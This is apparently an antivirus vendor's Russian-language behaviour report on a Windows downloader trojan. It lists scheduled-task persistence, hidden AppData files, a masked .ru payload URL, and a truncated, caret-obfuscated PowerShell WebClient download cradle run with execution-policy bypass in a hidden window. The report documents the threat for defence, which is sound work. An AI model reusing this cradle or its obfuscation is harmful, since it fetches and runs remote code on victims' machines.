Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\nvngxupdatecheckdaily_{693d7eba-7eba-7eba-7eba-693d7eba7eba}
Вредоносные функции
Создает и запускает на исполнение
- '<LS_APPDATA>\tempxgv49.jpg'
Загружает файлы и запускает на исполнение.
Изменения в файловой системе
Создает следующие файлы
- <LS_APPDATA>\tempxgv49.jpg
- %TEMP%\6b79.tmp
- %APPDATA%\rjciujv
- %APPDATA%\edhvbag
Присваивает атрибут 'скрытый' для следующих файлов
- %APPDATA%\rjciujv
- %APPDATA%\edhvbag
Удаляет следующие файлы
- <LS_APPDATA>\tempxgv49.jpg
Сетевая активность
TCP
Запросы HTTP GET
- http://an#####agazinchik.ru/poperclip/mstop.exe
- http://www.ms###csi.com/ncsi.txt
UDP
- DNS ASK an#####agazinchik.ru
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c rDvLbCWaYNkGVHu & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var....' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c rDvLbCWaYNkGVHu & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var....
